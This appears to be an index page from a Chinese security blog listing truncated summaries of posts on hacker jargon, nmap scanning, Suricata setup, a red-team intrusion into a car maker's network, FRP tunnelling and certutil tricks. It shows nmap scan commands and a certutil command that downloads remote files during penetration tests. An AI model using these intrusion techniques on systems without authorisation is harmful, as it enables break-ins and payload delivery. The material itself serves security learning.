夜会美

摘要： 每个行业都有黑话，刚入行的小白一眼看过去简直是摸不着头脑，今天我给大家梳理一下渗透/黑客/网络安全这行常见的行业术语！ 白帽子：白帽子描述的是正面的黑客。通过技术手段识别计算机系统或网络系统中的安全漏洞，提交给厂商并提出修复方法。 黑帽子：为了谋取利益而行走在法律边缘甚至违法乱纪的黑客。 灰帽子：介 阅读全文

摘要： 大家好，又见面了，我是你们的朋友全栈君。 1. nmap -sT 192.168.96.4 //TCP连接扫描，不安全，慢 2. nmap -sS 192.168.96.4 //SYN扫描,使用最频繁，安全，快 3. nmap -Pn 192.168.96.4 //目标机禁用ping，绕过ping扫 阅读全文

摘要： 几个月之前照着官方文档安装过，一次性就成功，昨天重装了服务器再安装Dalton，怎么都安装不了 一直报错 ERROR: Service 'agent-suricata-current' failed to build: The command '/bin/sh -c ./configure --en 阅读全文

摘要： 0x00 前言 本文介绍了笔者在某次攻防演练中，如何从外网渗透到某车企的内网的详细过程（为了保护敏感信息，所有数据都已经脱敏，有些截图也不完整，请见谅）。 这次网络攻防演练分为两个阶段一共十四天，前七天是私有资源阶段，后七天是公共资源池阶段。共有12支队伍参与比赛，我们公司全程只有两名选手参赛。由于 阅读全文

摘要： 目录 1、三次握手 2、四次挥手 3、11种状态名词解析 TCP的三次握手和四次挥手实质就是TCP通信的连接和断开。 三次握手：为了对每次发送的数据量进行跟踪与协商，确保数据段的发送和接收同步，根据所接收到的数据量而确认数据发送、接收完毕后何时撤消联系，并建立虚连接。 四次挥手：即终止TCP连接，就 阅读全文

摘要： 灰常简单 首先安装docker 使用官方安装脚本自动安装 64位的centos7和8安装命令如下： curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使用国内 daocloud 一键安装命令： curl -sS 阅读全文

摘要： 前言 之前在一个项目中遇到了一个渗透环境，只能使用工具代理远程访问内网，于是便接触了FRP这款内网穿透工具，通过内网反向代理进行远程渗透测试。这篇文章就简单介绍如何实现FRP反向代理渗透，作为个人笔记方便以后查阅，也分享给大家提供参考。 0x01 工具简介 FRP 是一个专注于内网穿透的高性能的反向 阅读全文

摘要： 1.学好Python 2.考个CISP证(CISP-PTS?) 3.学好PHP 4.丰富实战渗透的经验 阅读全文

摘要： 前言 在先知看到一篇关于certutil命令的文章（关于certutil的探究），讲得很详细、很全面。特此记录下本人在渗透时使用certutil的一些方法。 在cmd下使用certutil下载远程文件 命令： certutil.exe -urlcache -split -f http://192.1 阅读全文

摘要： 乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。 乌鸦安全拥有对此文章的修改、删除和解释权限 阅读全文